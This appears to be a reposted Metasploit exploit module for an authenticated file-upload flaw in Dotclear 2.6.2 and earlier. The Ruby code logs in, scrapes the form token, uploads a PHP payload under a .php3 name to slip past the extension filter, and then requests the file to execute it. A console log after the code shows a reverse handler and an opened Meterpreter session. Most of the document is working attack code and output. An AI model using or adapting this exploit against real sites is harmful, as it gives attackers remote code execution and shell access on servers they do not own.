Dotclear Media Manager Authenticated Arbitrary File Upload Exploit

Bài liên quan

This is a Metasploit modules that leverages an authenticated arbitrary file upload vulnerability in Dotclear versions 2.6.2 and below.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161

## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##     require 'msf/core'   class Metasploit3 < Msf::Exploit::Remote   Rank = ExcellentRanking     include Msf::Exploit::Remote::HttpClient     def initialize(info = {})     super(update_info(info,       'Name'           => 'dotclear Media Manager Authenticated Arbitrary File Upload',       'Description'    => %q{       The vulnerability exists because of the filemanager::isFileExclude() method not properly verifying the extension of       uploaded files. This method just checks whether the uploaded file name matches the “exclude_pattern” regular expression,       which by default is set to “/\.php$/i”. This could be exploited to execute arbitrary PHP code by uploading a file with       multiple extensions or other extensions (like .php5 or .phtml) which might be handled as PHP scripts. Successful       exploitation of this vulnerability requires an account with permissions to manage media items.       },       'Author'         =>         [           'Egidio Romano' #discovery         ],       'License'        => MSF_LICENSE,       'References'     =>         [           ['URL', 'http://seclists.org/fulldisclosure/2014/May/108']         ],       'Payload'            =>         {           'Space' => 10000, # just a big enough number to fit any PHP payload           'DisableNops' => true         },       'Platform'       => 'php',       'Arch'         => ARCH_PHP,       'Targets'        =>         [           [ 'dotclear 2.6.2', { } ],         ],       'DefaultTarget'  => 0,       'DisclosureDate' => 'May 21 2014'))       register_options([       OptString.new('USERNAME', [true, 'The username to authenticate with', 'username']),       OptString.new('PASSWORD', [true, 'The password to authenticate with', 'password']),       OptString.new('TARGETURI', [true, 'The full URI path to the instance', '/']),     ], self.class)   end     def check   end     def exploit     post = {       'user_id' => datastore['USERNAME'],       'user_pwd' => datastore['PASSWORD']     }       print_status("Authenticating...")     res = send_request_cgi({       'uri' => normalize_uri(target_uri.path, 'admin', 'auth.php'),       'method' => 'POST',       'vars_post' => post     })         if !res or !res.body       fail_with("Server did not respond in an expected way")     end       cookie = res.headers['Set-Cookie']       print_status("Getting xd_check...")     res = send_request_cgi({       'uri' => normalize_uri(target_uri.path, 'admin', 'media.php?popup=1'),       'cookie' => cookie     })       if !res or !res.body       fail_with("Server did not respond in an expected way")     end       res.body =~ /name="xd_check" value="(.*)"  \/><input type="hidden" name="d"/       xd_check = $1       data = Rex::MIME::Message.new     filename = Rex::Text::rand_text_alpha(8)       data.add_part('2097152', nil, nil, 'form-data; name="MAX_FILE_SIZE"')     data.add_part(xd_check, nil, nil, 'form-data; name="xd_check"')     data.add_part('', nil, nil, 'form-data; name="upfiletitle"')     data.add_part('', nil, nil, 'form-data; name="d"')     data.add_part('<?php ' + payload.encoded + ' ?>', nil, 'text/php', 'form-data; name="upfile[]"; filename="' + filename + '.php3')       print_status("Sending payload...")     res = send_request_cgi({       'uri' => normalize_uri(target_uri.path, 'admin', 'media.php?pop_up=1&post_id='),       'method' => 'POST',       'cookie' => cookie,       'data' => data.to_s,       'ctype' => 'multipart/form-data; boundary=' + data.bound     })       if !res or !res.body       fail_with("Server did not respond in an expected way")     end       #do something with res       print_status("Popping shell...")     send_request_cgi({       'uri' => normalize_uri(target_uri.path, 'public', filename + '.php3')     })   end end   __END__ msf exploit(dotclear_file_upload) > show options   Module options (exploit/multi/http/dotclear_file_upload):      Name       Current Setting  Required  Description    ----       ---------------  --------  -----------    PASSWORD   fdsafdsa         yes       The password to authenticate with    Proxies                     no        Use a proxy chain    RHOST      192.168.1.114    yes       The target address    RPORT      80               yes       The target port    TARGETURI  /dotclear        yes       The full URI path to the instance    USERNAME   fdsa             yes       The username to authenticate with    VHOST                       no        HTTP server virtual host     Exploit target:      Id  Name    --  ----    0   dotclear 2.6.2     msf exploit(dotclear_file_upload) > exploit   [*] Started reverse handler on 192.168.1.31:4444 [*] Authenticating... [*] Getting xd_check... [*] Sending payload... [*] Popping shell... [*] Sending stage (39848 bytes) to 192.168.1.114 [*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.114:33825) at 2014-05-21 18:39:07 -0500   meterpreter > sysinfo Computer    : ubuntu OS          : Linux ubuntu 3.5.0-23-generic #35~precise1-Ubuntu SMP Fri Jan 25 17:15:33 UTC 2013 i686 Meterpreter : php/php meterpreter >   # DD0CF93049889DA5   1337day.com [2014-05-26]   8A24644AB4B17420 #